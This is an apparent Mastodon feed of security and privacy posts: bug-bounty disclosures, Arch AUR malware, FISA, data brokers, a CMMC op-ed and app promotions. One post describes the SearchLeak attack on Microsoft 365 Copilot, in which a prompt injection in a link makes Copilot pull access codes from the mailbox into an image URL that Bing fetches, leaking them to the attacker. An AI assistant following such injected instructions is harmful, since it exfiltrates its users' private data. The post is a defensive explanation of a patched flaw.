0 days since provenance checks protected us from [checks notes] another project starting to upload distributions via #uv.

#Python #security

✈️ New Blog Post: Your Boarding Pass Is a Skeleton Key. Frontier Airlines Doesn't Care.

Frontier's mobile API returns full passport numbers, home addresses, children's DOB, credit card details, and KTNs for any booking. The only auth? A PNR and last name. Printed on every boarding pass.

Reported March 3rd. 105 days later, still live. They fixed the least important vuln and ghosted me on the rest. They also updated the website code and somehow made the leaks worse.

Full writeup: https://bobdahacker.com/blog/frontier-airlines-hack

#InfoSec #BugBounty #ResponsibleDisclosure #FrontierAirlines #Security #CyberSecurity #Privacy #Aviation #PCIDSS #DataExposure

WhatsApp Clone, but Decentralized with P2P Messaging

App: https://Enkrypted.Chat

"Secure and private" is the general goal.

This is a technical/concept demo of a fairly unique approach using a browser-based, local-first and webrtc.

This is intended to introduce a new paradigm in client-side managed secure cryptography. We can avoid registration of any sort.

Features:

* P2P
* End to end encryption
* Signal protocol
* Post-Quantum cryptography
* File transfer
* Local-first
* No registration
* No installation
* No database
* TURN server

Feel free to reach out for clarity instead of diving into the docs/code.

IMPORTANT: While this is aiming to provide a secure experience, it isnt audited or reviewed. **Shared for testing, feedback and demo purposes only.** Please use responsibly.

#Privacy #OpenSource #P2P #WebRTC #Decentralization #DigitalSovereignty #CyberSecurity #FOSS #SelfHosted #NoCloud #AntiCorp #Encryption #WebDev #TechLiberty #PrivateMessaging #Networking #DataPrivacy #InternetFreedom #LocalFirst #SoftwareEngineering #WebApps #ZeroKnowledge #PrivacyTech #IndieDev #NoSignup #NoInstall #DecentralizedWeb #SecureMessaging #BrowserApp #TechEthics #P2P #WebRTC #PeerJS #ZeroData #EphemeralData #Encryption #E2EE #BrowserToBrowser #NoInstall #Privacy #Security #Decentralized #Messaging #VideoCall #NoTracking #PrivateMessaging #Prototype #Demo #WorkInProgress #CloseSource #OpenSource #WebDev #GitHub #TechDevelopment #WhatsApp #ChatApp #InstantMessaging #PWA

Voice Age Verification

https://agewarden.ai/

#HackerNews #Voice #Age #Verification #technology #AI #age #verification #security #privacy

⚽ New Blog Post: I Could've Rickrolled the Entire FIFA World Cup. All I Needed Was My ID.

Registered on FIFA's public Agent Platform, got added to their Entra tenant, and accessed the Streaming Management panel for every live World Cup 2026 match. RTMP ingest URLs, stream keys, all five camera angles. Confirmed live in VLC. An attacker could have replaced live camera feeds on TV worldwide.

Full writeup: https://bobdahacker.com/blog/fifa-hack

#InfoSec #BugBounty #ResponsibleDisclosure #FIFA #WorldCup #Security #CyberSecurity #RTMP #BrokenAccessControl

#Meta Tapped a #Pentagon Supplier to #Prototype #FaceRecognition for Its Glasses

#RankOne , whose board includes a former #CIA deputy director and a former #FBI science chief, supplied face recognition to Meta for internal development of its smart glasses app.
#privacy #security

https://www.wired.com/story/meta-rank-one-computing-face-recognition-smart-glasses/

Nothing good can last, especially in the world of late-stage capitalism (along with enshittification that borne from it)...

Ars Technica: Users cry foul after AMD stripped memory crypto from its consumer CPUs

https://arstechnica.com/security/2026/06/users-cry-foul-after-amd-stripped-memory-crypto-from-its-consumer-cpus/

#AMD #Security

Canadian Government Gears Up to Pretend to Care About Privacy

Reports are surfacing saying that privacy reform is going to be tabled soon. We've been through this song and dance before.

https://www.freezenet.ca/canadian-government-gears-up-to-pretend-to-care-about-privacy/

#News #Privacy #Security #Canada #legislation #PrivacyReform

The most interesting thing about the new SearchLeak attack on Microsoft 365 Copilot isn't any single bug. It's that none of the three pieces was dangerous on its own. Varonis combined a prompt injection via a URL parameter, an HTML rendering race condition, and a server-side request forgery in Bing's image search. Each of these is a common bug that security teams usually consider minor. But when you put them together with a Copilot that can access your mailbox, OneDrive, and SharePoint, they create a critical flaw. Microsoft has since patched this issue (CVE-2026-42824).

This is how the attack worked:

* The victim clicks a link. That's the whole interaction. They type nothing.

* The link instructs Copilot to search the mailbox, find sensitive information such as access codes, and place it into an image URL.

* Bing retrieves that image, which sends the stolen data to the attacker's server. Bing serves as the delivery service, allowing the attack to bypass the content security policy intended to stop it.

From the user's perspective, Copilot just pauses for a moment. There is no visible sign that any data has been taken.

In the past, we've spent years rating bugs by their severity on their own. An SSRF here, an HTML injection there—each seemed minor. But when an AI assistant can follow instructions from untrusted input and access your real data, those minor bugs become much more serious. Old types of vulnerabilities become important again in this new context.

If your company uses Copilot or any AI assistant that can access company data, it is important to ask your team how they are rating bugs that affect it. The way we judge what is low risk has changed.

https://www.bleepingcomputer.com/news/security/new-attack-turned-microsoft-365-copilot-into-1-click-data-theft-tool/

#AI #Cybersecurity #InfoSec #security #privacy #cloud #AttackChain

Congress and the administration are wrangling over reauthorization of a national security surveillance tool. Viewing security and constitutional rights as compatible rather than competing may help. #congress #security #privacy

https://www.csmonitor.com/Editorials/the-monitors-view/2026/0612/Upholding-US-values-of-security-and-privacy?utm_source=flipboard&utm_medium=activitypub

Posted into Now What? @now-what-csmonitor

From automotive dealerships to retail spaces, hotels, and industrial sites, businesses today face increasing risks like theft, unauthorized access, and blind spots.

Modern protection now depends on smarter solutions such as remote guard monitoring, AI-powered surveillance, and advanced video systems designed for real-time threat detection.

Read the full blog here:
https://ohzsecurity.blogspot.com/2026/06/complete-guide-to-modern-security-tips.html

#Security #CommercialSecurity #AI #RemoteMonitoring #Surveillance #PropertyProtection

Rank One, whose board includes a former CIA deputy director and a former FBI science chief, supplied face recognition to Meta for internal development of its smart glasses app.

Alt...

Meta Tapped a Pentagon Supplier to Prototype Face Recognition for Its Glasses

Things that make me instantly happy: beautiful night sky, beautiful forests and nature (night or day), fireflies, aurora borealis, rain, the smell of rain, good food, good satire, good coffee, good movies, good music, good art, happy animals, Linux, privacy, security, human rights… etc. 🌌🐧🌲🌿🌧️ ✨

#instantlyhappy #beautifulNightsky #beautifulForests #nature #nightOrDay #fireflies #auroraborealis #rain #smellOfRain #goodFood #happyAnimals #Linux #privacy #security #humanRights

What makes you instantly happy… 🤔

The security situation with the Arch Linux AUR got a lot worse https://www.gamingonlinux.com/2026/06/the-security-situation-with-the-arch-linux-aur-got-a-lot-worse/

#Linux #ArchLinux #Security

Господа арчеводы (и арчебейздоводы на Manjaro, CachyOS, EdeavourOS, etc), вам там подвезли добра в AUR:

https://ioctl.fail/preliminary-analysis-of-aur-malware/

TL;DR: в ~400+ пакетов (о которых известно на данный момент) в AUR добавили малварь, которая ворует креды и имеет встроенный руткит.
Если недавно (несколько дней) обновлялись из AUR не вычитывая сорцы пакетов - стоит напрячься.

Вот тут есть список пакетов, о которых известно:
https://lists.archlinux.org/archives/list/aur-general@lists.archlinux.org/thread/FGXPCB3ZVCJIV7FX323SBAX2JHYB7ZS4/

@rf
#Linux #Arch #AUR #security #malware #rootkit #news

Le Monde's research showed ad data from smartphone SDKs. #DataBrokers can expose identities and daily movements of police, military, and intelligence personnel… sold by data brokers from everyday apps. If those people can get exposed, everyone can. Mitigation below! Read: https://proton.me/blog/ad-tech-privacy #Privacy #DataBrokers 🛰️📱#Security #Surveillance #MassSurveillance

#tldr "…What can you do about it?
There’s no way to stop all kinds of tracking, but you can take the following actions to reduce the granularity of the datasets collected:

Turn off location services(new window) when not in use and deny apps location permissions.
Use a VPN(new window) to hide your real IP address. DNS filtering features such as Proton VPN’s NetShield Ad-blocker(new window) can also help bock ad and tracker scripts.
Delete your advertising ID on Android (Settings → Google → All services → Ads → Privacy and security → Ads → Delete advertising ID). iPhones don’t provide this option."

Use GrapheneOS without Google

Alt...

screenshot of how to delete advertising ids, OCR'd text: " Delete your advertising ID on Android (Settings —- Google — All services — Ads — Privacy and security —- Ads — Delete advertising ID). iPhones don't provide this option. <€ Manage the info used to show you ads and measure ad performance Reset advertising ID This generates a new advertising ID that apps can use from now on Delete advertising ID Apps can no longer use this advertising ID to show you personalised ads @ These settings help you control what data advertisers can use to show you ads Advertising ID: daa08b66-6b6c-4876-a283-d4e53064c155, Learn more about advertising |D" Quote: "Delete your advertising ID on Android (Settings → Google → All services → Ads → Privacy and security → Ads → Delete advertising ID). iPhones don’t provide this option. "

This echoes the 1990s encryption wars, when the government classified math as munitions and investigated PGP's creator. Controls on software already in global circulation handicap U.S. firms without stopping capability spread elsewhere. History may repeat. #AI #Policy #Security https://www.implicator.ai/opinion-take-the-ai-kill-switch-away-from-the-politicians/

New AmnyX website is live now www.amnyx.com

#website #Amnyx #new #safety #security
@AmnyX

https://Enkrypted.Chat

This is intended to introduce a unique approach in client-side managed secure cryptography. We can avoid registration of any sort.

Features:

PWA
P2P
End to end encryption
Signal protocol
Post-Quantum cryptography
Multimedia
File transfer
Video calls
Local-first
No registration
No installation
No database
TURN server

https://www.reddit.com/r/positive_intentions

#Privacy #OpenSource #P2P #WebRTC #Decentralization #DigitalSovereignty #CyberSecurity #FOSS #SelfHosted #NoCloud #AntiCorp #Encryption #WebDev #TechLiberty #PrivateMessaging #Networking #DataPrivacy #InternetFreedom #LocalFirst #SoftwareEngineering #WebApps #ZeroKnowledge #PrivacyTech #IndieDev #NoSignup #NoInstall #DecentralizedWeb #SecureMessaging #BrowserApp #TechEthics #P2P #WebRTC #PeerJS #ZeroData #EphemeralData #Encryption #E2EE #BrowserToBrowser #NoInstall #Privacy #Security #Decentralized #Messaging #VideoCall #NoTracking #PrivateMessaging #Prototype #Demo #WorkInProgress #CloseSource #OpenSource #WebDev #GitHub #TechDevelopment #WhatsApp #ChatApp #InstantMessaging #PWA

Alt...

Send Messages Securely. No cloud. No trace. Decentralized P2P encrypted messaging - No setup required

Michigan lawmakers are pushing legislation that wouldn’t just ban the sales of Chinese-made cars in the The Great Lakes State, it would ban cars with Chinese tags from even visiting. The Protecting America From Chinese Cars Act joins the Connected Vehicle Security Act aiming to protect U.S. car companies from cheaper Chinese EV competition in […]

This is one reason I don't like, or recommend, adding third party repos to any #Linux distribution.

Title: Arch Linux's AUR Sees More Than 400 Packages Compromised With Malware

Link: https://www.phoronix.com/news/Arch-Linux-AUR-400-Compromised

#ArchLinux #Security #CyberSecurity

Follow-up; it got hammered.

Quote:

Even at 1,579 packages listed, that final update noted, it's a "list containing many (but not all) of the affected packages". Ouch.

Title: Arch #Linux Now Believes Malware Incident Under Control: More Than 1,500 Affected Packages

Link: https://www.phoronix.com/news/Arch-Linux-AUR-More-Than-1500

#ArchLinux #Security #CyberSecurity

Controversial #FISA spying law expires tonight. The #spying will continue.

Title VII of the Foreign Intelligence #Surveillance Act (FISA) is set to expire at midnight tonight after Congress failed to pass an extension of the controversial spying law. But that doesn't mean the government's spying powers will disappear.

Surveillance under #Section702 of FISA "operates under yearlong certifications approved by the FISA Court," the Brennan Center for Justice at New York University School of Law explained this week. The current certification will remain in place until March 2027 under the yearlong certification issued by the Foreign Intelligence Surveillance Court on March 17, 2026.
#privacy #security

https://arstechnica.com/tech-policy/2026/06/controversial-fisa-spying-law-expires-tonight-the-spying-will-continue/

Dennis E. Powell writes, "As has been noted here many times, it is not possible to do anything online (and often elsewhere) without being tracked." But there are things we can do 👉🏻 https://ofb.biz/sa1426

#Privacy #Security #Android

Massachusetts lawmakers advanced a privacy bill to Gov. Maura Healey requiring tech firms to delete sensitive personal data and stop selling location data. 🔒
The Senate-backed measure would limit data brokerage and targeted ads by firms including Meta and Google for 7 million residents. 🏛️

🔗 https://www.inc.com/moses-jeanfrancois/tech-giants-may-soon-be-forced-to-wipe-your-data-if-you-live-in-this-state-heres-why/91357761

#TechNews #Massachusetts #DataPrivacy #Meta #Google #Location #Data #Privacy #DataProtection #Surveillance #Transparency #DigitalRights #Security #Technology #Policy #Law

Meta's Disastrous Month. Privacy, Security and Trust issues abound... they need to be shut down.

#News #TechNews #Meta #Privacy #Security #Trust #Facebook #Instagram #WhatsApp

https://youtu.be/NNmXlHpEN7c

Daily podcast: Meta's Disastrous Month. Privacy, Security and Trust issues abound... they need to be shut down.

#News #TechNews #Meta #Privacy #Security #Trust #Facebook #Instagram #WhatsApp #podcast

https://soundcloud.com/nickaesp/dmm

#tech #technology #BigTech #data #security #privacy #safety #InfoSec #IT #surveillance #computing #digital #online #internet #web #cloud #meme

Alt...

Meme, showing a continuous circle of data breach messages from corporations… Ahaha you're not gonna believe this but we had a bit of a data breach. Your data is probably for sale online now. That means someone could easily impersonate you. Going forward we're gonna need more of your data to make sure its you.

I can't seem to delete my ProFlowers account. The option to do so was removed from their UI at some point. Calling in to their helpless desk results in me being told "I can't delete accounts, someone will call you back."

I never get a call back. IM chat: same result.

Just Delete Me has no pointers for this one.

Suggestions?

#askfedi #justdeleteme #proflowers #privacy #security #darkpatterns

AI, Crippling CMMC Regulations Converge On Small Businesses

“NATIONAL DEFENSE MAGAZINE” By  Pete Sfoglia

“The marriage of artificial intelligence, quantum computing, robotics and crippling regulation creates a perfect storm headed straight at the Cybersecurity Maturity Model Certification program”

_______________________________________________________________________________________________________

“The marriage of artificial intelligence, quantum computing, robotics and crippling regulation creates a perfect storm headed straight at the Cybersecurity Maturity Model Certification program, and those who designed the mandate have no more understanding of what it means at ground level than Bill Gates has of the price of groceries.

The intent was sound. The consequences may be catastrophic. Make no mistake: the convergence of these four forces represents significant disruption.

CMMC 2.0 was a necessary response to a real threat. Nation-state adversaries have spent years gutting the U.S. defense industrial base, walking off with designs and manufacturing processes that took U.S. companies decades to build.

Self-reported compliance scores that bore no relationship to actual security posture had to end. But what followed was a compliance architecture that drops enterprise-grade financial burdens on small manufacturers running margins that can’t absorb them, while mandating encryption standards already being defeated and ignoring the AI and robotics threats that are rewriting the rules of engagement in real time.

The Defense Department estimates 118,000 companies fall under CMMC Level 2. The overwhelming majority have never heard of security information and event management, or SIEM, technology, let alone budgeted for it.

Before a CMMC compliance assessor walks in the door, cybersecurity costs for a typical small or medium-sized business are about $60,000 to $100,000 per year — a SIEM subscription is $14,000 annually, and it costs $30,000 to implement and configure it — plus multi-factor authentication, endpoint detection and security hardening on top. Add a virtual chief information security officer at $70,000 a year — because none of these tools run themselves — and a company is looking at $200,000 to $300,000 in year one, and $110,000 to $145,000 every year after. The assessment fee is almost beside the point by then.

A company doing $3 million in defense revenue at a 7 percent margin clears $210,000 in profit. Year-one compliance takes every dollar of it. And it hits the contractor who has been implementing National Institute of Standards and Technology 800-171 controls for five years the same as the one who’s done nothing. There’s no credit for prior effort, no discount for good faith.

The U.S. defense industry has already shed numerous small business participants over the past decade. Without relief, CMMC accelerates the exodus. And the first ones out the door won’t be the weakest. They will be the most capable, the ones with commercial customers who don’t require a six-figure annual compliance tax.

This is the part that should alarm everyone, and doesn’t, because the lawmakers shaping this policy wouldn’t know an IP packet if they tripped over one. The CMMC Level 2 encryption mandates, the Rivest-Shamir-Adleman family of public-key cryptosystems and elliptic-curve algorithms over Transport Layer Security 1.2 will fold like a cheap lawn chair against a quantum computer. Algorithms that would take an army of supercomputers decades to crack will evaporate in minutes using superposition and quantum entanglement.

Here’s what makes it worse — nobody has to wait for quantum computers to arrive. Adversaries are vacuuming up encrypted traffic, VPN sessions and controlled unclassifed information file transfers and storing them for the day decryption becomes trivial. Harvest now, decrypt later. It’s not theoretical. It’s operational.

NIST finalized post-quantum cryptography standards in 2024. The federal government has published a migration roadmap. CMMC ignores both. Small and medium businesses are bleeding out financially to implement encryption, and their adversaries are already stockpiling. That’s not a security mandate. It’s a very expensive illusion of one.

Meanwhile, AI-powered malware now rewrites its own attack signatures faster than defenses can respond. AI-generated phishing — personalized, convincing and relentless — accounts for the majority of attacks. And for defense manufacturers, AI-driven robotics has created an entirely new category of exposure that CMMC doesn’t address.

Computer numerical control machines and robotic assembly lines tied into corporate networks for efficiency carry attack surfaces that didn’t exist when NIST 800-171 was written. A compromised robotic system doesn’t just leak controlled unclassified information, it can embed manufacturing defects in weapons components that nobody finds until something fails in the field.

The fiscal year 2026 National Defense Authorization Act tells the Defense Department to fold AI security into CMMC, meaning this already unaffordable mandate will get heavier before most small businesses have finished choking down the current version.

For now, don’t abandon CMMC. Fix it. A tiered subsidy program, modeled on Defense Production Act investments, must deliver direct financial assistance to Level 2 subcontractors below defined revenue thresholds and subsidize assessment fees. CMMC must adopt NIST’s post-quantum standards immediately, not eventually. And the Pentagon needs a real AI and operational technology security framework before it lands as another unfunded mandate on contractors already at the wall.

Phase 2 enforcement starts in November. Currently, small business owners are deciding whether to invest in compliance or walk away from the defense market for good. Every month that passes without relief, without a post-quantum roadmap, without an AI framework, without government subsidies, is a month this supply chain shrinks permanently.

Our adversaries have spent years trying to hollow out the U.S. defense industrial base. They couldn’t have designed a more effective weapon than a compliance mandate that does the job for them.”

ABOUT THE AUTHOR:

Pete Sfoglia served as regional practice leader for cybersecurity at Ernst and Young and as global head of cyber compliance at Wipro. He is now co-founder and CEO of Pistos Information Protection, an independent consulting practice focused on cybersecurity compliance for small and mid-sized businesses.

If An Garda Síochána can't get a grip on these low-level petit-fash events today, then that will only serve to confirm that Ireland is so utterly fucked for security during the EU Presidency, which starts in - *checks notes* - 20 days.

https://toot.wales/@HarriettMB/116726046506070217

(cc @EUCommission)

#MastoDaoine #EU #Dublin #security #AntiFascism

New on AboutSignal ✨

Signal Security & Privacy Guide 🔒: A complete guide to Signal’s encryption, metadata protection, and privacy features

👉 https://aboutsignal.com/signal-security-privacy-guide/

#signal #signalapp #signalmessenger #aboutsignal #tech #privacy #security

US lawmakers are alarmed that Bill Pulte, a housing official with no intelligence experience, is poised to take charge of one of the government's most powerful surveillance tools.

Alt...

Trump Risks Key Surveillance Authority Over ‘Unqualified’ Spy-Chief Pick

#Mozilla, why are you playing along with Google's devious game and #betraying the #principles of #free #software?

source: omgubuntu.co.uk/2026/06/mozill…

Nonetheless, the appearance of ‘device attestation’ in Firefox’s mobile codebase has raised eyebrows in the #FOSS #community, including from #mobile projects based on the #Android Open Source Project (AOSP) codebase, like #LineageOS and #GrapheneOS, which omit Play services.

Given that Firefox’s entire USP on Android is that it’s an open-source, privacy-respecting alternative for those avoiding #Google (and open-source, privacy-conscious users often run non-stock Android) it’s a move that, short of further explanation, rubs some the wrong way.

#news #software #security #ai #technology #cybersecurity #Firefox #browser #future #smartphone #api #evil #economy #bigtech #fail #floss #opensource #principle #opensource #ethics #surfing #web #www #freedom #alphabet surveillance #tracking #power #privacy #root #rooted #question #aosp

‘BusPatrol’ Put #AI #Cameras in Tens of Thousands of #School #Buses. Now They Want to Give #Cops #Access

source: 404media.co/buspatrol-put-ai-c…
without paywall: archive.is/20260526155324/404m…

#BusPatrol is aware of the #controversy around #ALPR cameras, and particularly of the concern that #ICE may gain access to the data, according to the BusPatrol documents ...

The danger here, aside from the misuse of data, is above all that children grow up with this and come to see it as normal to be constantly monitored by cameras. A society under constant surveillance develops differently. It is more conformist, less critical, and very keen on blending into the crowd unnoticed and not standing out. This is exactly what the ruling elite wants: a society that silently endures everything because it fears #repression through the cameras.

#news #technology #children #security #cctv #surveillance #privacy #education #camera #society #future #politics #police #control #bigdata #bigtech #bigbrother #orwell #fear #kids #system #matrix #politics #economy #monitoring #tracking #abuse #video #danger #warning #humanity

@aliasvault may i propose a feature that normally is not handeled by password manager, but could differenciate you from other ?

Propose the Sync of bookmark between the browser and you app.

with the new chrome://flags/#bookmarks-encryption
in chromium it's a change to have a true E2EE (or client-side encrypted) sync of the broswer without relying on browser internal sync (when existing).

#privacy #sync #security #clientencryption #encryption #password #browser #bookmarks

Meta AI embedded into WhatsApp lies to you!
About Privacy and about how it works. That's fucked up!!

Here is how you try it:
- Text to the AI about whatever topic, generate a picture or whatever.
- Go to the Profile
- Click "Clear Chat" and also "Clear Chat" hidden in the Three Dot Menu top right.
- To make sure everything is Gone, go to your chats-List and delete the Chat with Meta-AI

Now start a new Conversation with "Hi" and be surprised!!

#meta #facebook #ai #privacy #security #whatsapp